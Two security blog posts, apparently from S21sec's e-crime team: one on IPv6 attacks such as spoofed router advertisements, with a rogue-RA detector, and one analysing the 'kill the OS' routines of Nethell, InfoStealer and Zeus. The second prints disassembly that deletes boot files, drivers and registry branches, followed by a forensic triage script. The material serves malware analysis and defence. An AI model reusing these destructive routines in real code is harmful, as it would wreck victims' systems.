
IPv6 Security (III)


IPv6 brings many changes that relate directly to security, but those are not the only ones that improve the security of the new IP protocol. In this post we will see how some of the features and changes coming with IPv6 affect the security of the protocol in an indirect manner.

Enhanced address space vs. ping sweeps
In IPv6 the default subnet size is 2^64, which means that a single network can contain 18.446.744.073.709.551.616 hosts.

With a 2GHz dual-core machine connected to a 100MBit network, an nmap scan (using the echo request/reply mechanism) of a /24 subnet takes 2.554 seconds. If we assume the same speed towards the remote IPv6 network we want to scan, it would take 5.835.714.585 years to scan the 2^64 subnet.

Network administrators face the problem that IPv6 addresses are not easy to remember. For practical reasons, all the hosts in an IPv6 network will be registered in a DNS server, so the main target for finding hosts in a remote network will be the DNS servers.

Stateless Address/Router Configuration
This is a point that affects the security of IPv6 negatively. What is a real help for administrators can also be an advantage for attackers aiming to gain access to the infrastructure.

When a new machine joins the network, it generates its EUI-64 IPv6 address, but before assigning the address to the interface it checks with a request packet whether the address is already in use by another host, to avoid conflicts.
Later on, the host asks the local network for a router. The router responds to that request and provides the information needed to connect the host to, e.g., the Internet.

All these automatic configuration mechanisms are based on trust, so anyone could spoof a message saying that the address is already assigned, or answer the router request in order to mount a man-in-the-middle attack.
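As an added example (not from the original post nor from the THC tools), a small detector in the spirit of RA Guard: it parses raw ICMPv6 Router Advertisements and flags any coming from a router that is not on an assumed allowlist (fe80::1 here). The packets are constructed inline for the demonstration.

```python
import ipaddress
import struct

# Assumed allowlist: link-local addresses of the routers we legitimately operate on this segment.
AUTHORISED_ROUTERS = {ipaddress.IPv6Address("fe80::1")}
ICMPV6, ROUTER_ADVERTISEMENT, OPT_PREFIX_INFO = 58, 134, 3


def build_ra(src, prefix, router_lifetime=1800):
    """Constructed sample only: minimal IPv6 + ICMPv6 Router Advertisement with one Prefix Information option."""
    net = ipaddress.IPv6Network(prefix)
    opt = struct.pack("!BBBBIII16s", OPT_PREFIX_INFO, 4, net.prefixlen, 0xC0,  # L and A flags set
                      2592000, 604800, 0, net.network_address.packed)
    icmp = struct.pack("!BBHBBHII", ROUTER_ADVERTISEMENT, 0, 0, 64, 0, router_lifetime, 0, 0) + opt
    hdr = struct.pack("!IHBB16s16s", 0x60000000, len(icmp), ICMPV6, 255,
                      ipaddress.IPv6Address(src).packed, ipaddress.IPv6Address("ff02::1").packed)
    return hdr + icmp


def parse_ra(pkt):
    """Return (source, [advertised prefixes]) for a Router Advertisement, or None for anything else."""
    # RAs must arrive with hop limit 255: a lower value means the packet was forwarded, i.e. is off-link.
    if len(pkt) < 56 or pkt[0] >> 4 != 6 or pkt[6] != ICMPV6 or pkt[7] != 255:
        return None
    src = ipaddress.IPv6Address(pkt[8:24])
    icmp = pkt[40:40 + struct.unpack("!H", pkt[4:6])[0]]
    if icmp[0] != ROUTER_ADVERTISEMENT:
        return None
    prefixes, pos = [], 16  # options start after the 16-byte RA header
    while pos + 2 <= len(icmp):
        otype, olen = icmp[pos], icmp[pos + 1] * 8
        if olen == 0 or pos + olen > len(icmp):  # malformed option: stop rather than loop forever
            break
        if otype == OPT_PREFIX_INFO and olen == 32:
            prefixes.append(f"{ipaddress.IPv6Address(icmp[pos + 16:pos + 32])}/{icmp[pos + 2]}")
        pos += olen
    return src, prefixes


def rogue_ra_alerts(packets):
    """Flag RAs from routers outside the allowlist; hosts following plain ND simply trust all of them."""
    alerts = []
    for pkt in packets:
        parsed = parse_ra(pkt)
        if parsed and parsed[0] not in AUTHORISED_ROUTERS:
            alerts.append((str(parsed[0]), parsed[1]))
    return alerts
```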

The THC (The Hacker's Choice) group has demonstrated these and more attacks in practice and released the code here. The presentation is also well worth a look.

The solution to this problem, SEcure Neighbor Discovery (SEND), was already specified in 2005 in RFC 3971, but so far no implementation is to be found in recent operating systems.

Some more attacks on IPv6, not only related to the local trust model, can be found here.

Clemens Kurtenbach
S21sec e-crime





When a Bot master goes mad - Kill the OS

This time we take a close look at what can happen to an infected computer when the running bot receives a specific command to kill the operating system. Not all types of bot have this functionality, but banking Trojans usually do. We will take three examples (InfoStealer, Zeus/Zbot and Nethell/Ambler); these are the most common Trojans in whose binaries we have definitely found the malicious code responsible for killing Windows.


Nethell / Ambler:


Bot commands can often be spotted with the naked eye in the binary as plain strings, although not always as trivially as in the case of Nethell:




Looking for the subroutine that references the above strings, we arrive at the code doing the dirty work:


mov esi, offset aCNtdetect_com ; "C:\\NTDETECT.COM"
push edi
push esi
call GetFileAttributesA
mov edi, SetFileAttributesA
and al, 0F8h
push eax
push esi
call edi
push esi
call DeleteFileA
mov esi, offset aCNtldr ; "C:\\ntldr"


The code above deletes the files NTDETECT.COM and NTLDR; before deleting them it clears the Hidden/System/Read-Only attribute bits (the "and al, 0F8h" followed by SetFileAttributesA). The other bot command, KILLWINANDREBOOT, calls this same subroutine and then immediately attempts a system reboot.


InfoStealer:


InfoStealer's approach is undoubtedly effective:


push offset aDrivers_sys ; "\\drivers\\*.sys"
push eax ; Dest
call ds:wcscat
push 1 ; hFindFile
push offset delete ; int
lea eax, [ebp+FileName]
push 98967Fh ; int
push eax ; lpFileName
call recursive_findfile
add esp, 18h
call reboot


The subroutine tries to delete every driver in the drivers directory under System32. The first attempt is a normal delete; if that fails, it calls the MoveFileEx API with the MOVEFILE_DELAY_UNTIL_REBOOT flag, which deletes the file during the next startup.


InfoStealer also removes registry values that are needed to create a logon session:


HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Shell = Explorer.exe
UIHost = logonui.exe
HKLM\SYSTEM\CurrentControlSet\Services\DcomLaunch\Parameters
ServiceDll = rpcss.dll
HKLM\SYSTEM\CurrentControlSet\Services\RpcSs\Parameters
ServiceDll = rpcss.dll


Zeus / Zbot:


Last but not least, here comes the old Zeus. Although it needs the least code, it is nevertheless the most aggressive and robust:


push eax
push 80000001h
call ds:SHDeleteKeyA
mov eax, ds:buffer
push dword ptr [eax+50h]
mov esi, 80000002h
push esi
call ds:SHDeleteKeyA
mov eax, ds:buffer
push dword ptr [eax+54h]
push esi
call ds:SHDeleteKeyA
push 3E8h
call ds:Sleep
xor eax, eax
push eax
push eax
push eax
push eax
mov eax, ds:buffer
push 0Eh
push dword ptr [eax+30h]
call write_read_namedpipe


It "just" deletes two kinds of registry entries, but this includes WHOLE branches:


HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE\software
HKEY_LOCAL_MACHINE\system


The execution flow does not end here. Once the deletion has finished, it sends command 0Eh to its pipe server, where the following code starts zeroing the whole virtual address space (4GB) byte by byte:


push 8007h
call eax ; <--- SetErrorMode, to ignore everything
xor eax, eax
mov [eax], eax
xor eax, eax
; from address 0x00000000 - 0xFFFFFFFF
loc_1: mov byte ptr [eax], 0 ; fill the memory with zeros
inc eax
jmp short loc_1


Invoking Zeus' method in our test environment resulted in a BSOD (Blue Screen of Death).


What could be the attacker's intention in taking the victim's computer offline? To disappear and hide all tracks, making further analysis harder? In the case of banking Trojans, obviously not: as we have seen, none of these methods leads to significant data loss, the Trojan binaries are not removed, and neither are the registry startup entries. More probably, the point for a phisher is to gain time, cutting the victim off from the Internet before the unwanted money transfer is realised and further action could be taken.

Of course, this information is not meant to give anyone tips on how to kill Windows; rather, we hope it may help to unravel some mysterious case and support forensic analysis.
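As an added forensic triage example (not part of the original post), the checks below look for the traces the three routines above leave behind: missing NTLDR/NTDETECT.COM, missing Winlogon and RPCSS values, and drivers queued for deletion at reboot. It goes one step beyond the text by reading PendingFileRenameOperations, the Session Manager value where MOVEFILE_DELAY_UNTIL_REBOOT requests are recorded. The expected registry values are assumed defaults and should be matched to the baseline of the examined system.

```python
import os

# Artefacts touched by the kill-OS routines; expected values are assumed defaults, adjust to your baseline.
BOOT_FILES = ["NTDETECT.COM", "ntldr"]
EXPECTED_VALUES = {
    r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon": {"Shell": "Explorer.exe", "UIHost": "logonui.exe"},
    r"SYSTEM\CurrentControlSet\Services\DcomLaunch\Parameters": {"ServiceDll": "rpcss.dll"},
    r"SYSTEM\CurrentControlSet\Services\RpcSs\Parameters": {"ServiceDll": "rpcss.dll"},
}
PENDING_KEY = r"SYSTEM\CurrentControlSet\Control\Session Manager"


def pending_deletes(pending_ops):
    """PendingFileRenameOperations is a REG_MULTI_SZ of (source, target) pairs; an empty target is a delete."""
    return [pending_ops[i].replace("\\??\\", "", 1)
            for i in range(0, len(pending_ops) - 1, 2) if pending_ops[i + 1] == ""]


def assess(boot_files_present, registry, pending_ops):
    """Pure triage over collected data: boot files found, {key: {name: value}}, and the MULTI_SZ list."""
    present = {f.lower() for f in boot_files_present}
    findings = [f"boot file missing: {f} (Nethell/Ambler pattern)" for f in BOOT_FILES if f.lower() not in present]
    for key, values in EXPECTED_VALUES.items():
        for name, expected in values.items():
            actual = registry.get(key, {}).get(name)
            if actual is None:
                findings.append(f"{key}\\{name} missing (InfoStealer/Zeus pattern)")
            elif str(actual).lower() != expected.lower():
                findings.append(f"{key}\\{name} = {actual!r}, expected {expected!r}")
    drivers = [p for p in pending_deletes(pending_ops) if p.lower().endswith(".sys")]
    if drivers:
        findings.append(f"{len(drivers)} driver(s) queued for deletion at reboot (InfoStealer fallback): {drivers}")
    return findings


def collect_live(system_drive="C:\\"):
    """Collector for a live Windows host; winreg is imported here so the triage logic stays portable."""
    import winreg

    def read(key, names):
        out = {}
        for n in names:
            try:
                with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as k:
                    out[n] = winreg.QueryValueEx(k, n)[0]
            except OSError:  # key or value absent: exactly what the kill routines leave behind
                pass
        return out

    present = [f for f in BOOT_FILES if os.path.exists(os.path.join(system_drive, f))]
    registry = {key: read(key, vals) for key, vals in EXPECTED_VALUES.items()}
    pending = read(PENDING_KEY, ["PendingFileRenameOperations"]).get("PendingFileRenameOperations", [])
    return present, registry, pending
```

On a live host run assess(*collect_live()); for an offline image, feed assess() the values extracted from the SOFTWARE and SYSTEM hives instead.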


Jozsef Gegeny
S21sec e-crime











© Copyright S21sec 2012 - All rights reserved

